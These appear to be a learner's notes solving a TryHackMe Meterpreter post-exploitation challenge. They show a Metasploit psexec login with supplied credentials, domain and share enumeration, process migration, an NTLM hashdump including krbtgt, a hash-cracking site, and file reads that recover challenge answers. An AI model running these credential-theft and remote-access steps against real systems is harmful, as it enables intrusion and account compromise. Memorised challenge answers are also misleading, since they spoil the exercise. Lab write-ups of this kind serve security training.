#Task 5 Post-Exploitation Challenge 

use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set lhost 10.11.52.16
msf6 exploit(windows/smb/psexec) > set rhosts 10.10.207.249

msf6 exploit(windows/smb/psexec) > set SMBUser ballen
SMBUser => ballen                                                                                                                                       
msf6 exploit(windows/smb/psexec) > set SMBpass Password1                                                                                                
SMBpass => Password1                                                                                                                                    
msf6 exploit(windows/smb/psexec) > show options 
run

1
meterpreter > sysinfo

2.
run post/windows/gather/enum_domain

3
run post/windows/gather/enum_shares


4
ps

meterpreter > migrate 776
[*] Migrating from 3636 to 776...
[*] Migration completed successfully.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a9ac3de200cb4d510fed7610c7037292:::
ballen:1112:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
jchambers:1114:aad3b435b51404eeaad3b435b51404ee:69596c7aa1e8daee17f8e78870e25a5c:::
jfox:1115:aad3b435b51404eeaad3b435b51404ee:c64540b95e2b2f36f0291c3a9fb8b840:::
lnelson:1116:aad3b435b51404eeaad3b435b51404ee:e88186a7bb7980c913dc90c7caa2a3b9:::
erptest:1117:aad3b435b51404eeaad3b435b51404ee:8b9ca7572fe60a1559686dba90726715:::
ACME-TEST$:1008:aad3b435b51404eeaad3b435b51404ee:de94d2527e050d5abe863f05097a04b7::


answer: 69596c7aa1e8daee17f8e78870e25a5c:
https://crackstation.net/



search -f secrets.txt
Found 1 result...
=================

Path                                                            Size (bytes)  Modified (UTC)
----                                                            ------------  --------------
c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt  35            2021-07-30 14:44:27 +0700

meterpreter > 

cat secrets.txt
KDSvbsw3849! 

meterpreter > search -f realsecret.txt
Found 1 result...
=================

Path                               Size (bytes)  Modified (UTC)
----                               ------------  --------------
c:\inetpub\wwwroot\realsecret.txt  34            2021-07-30 15:30:24 +0700


cat realsecret.txt
The Flash is the fastest man alive

https://tryhackme.com/room/meterpreter
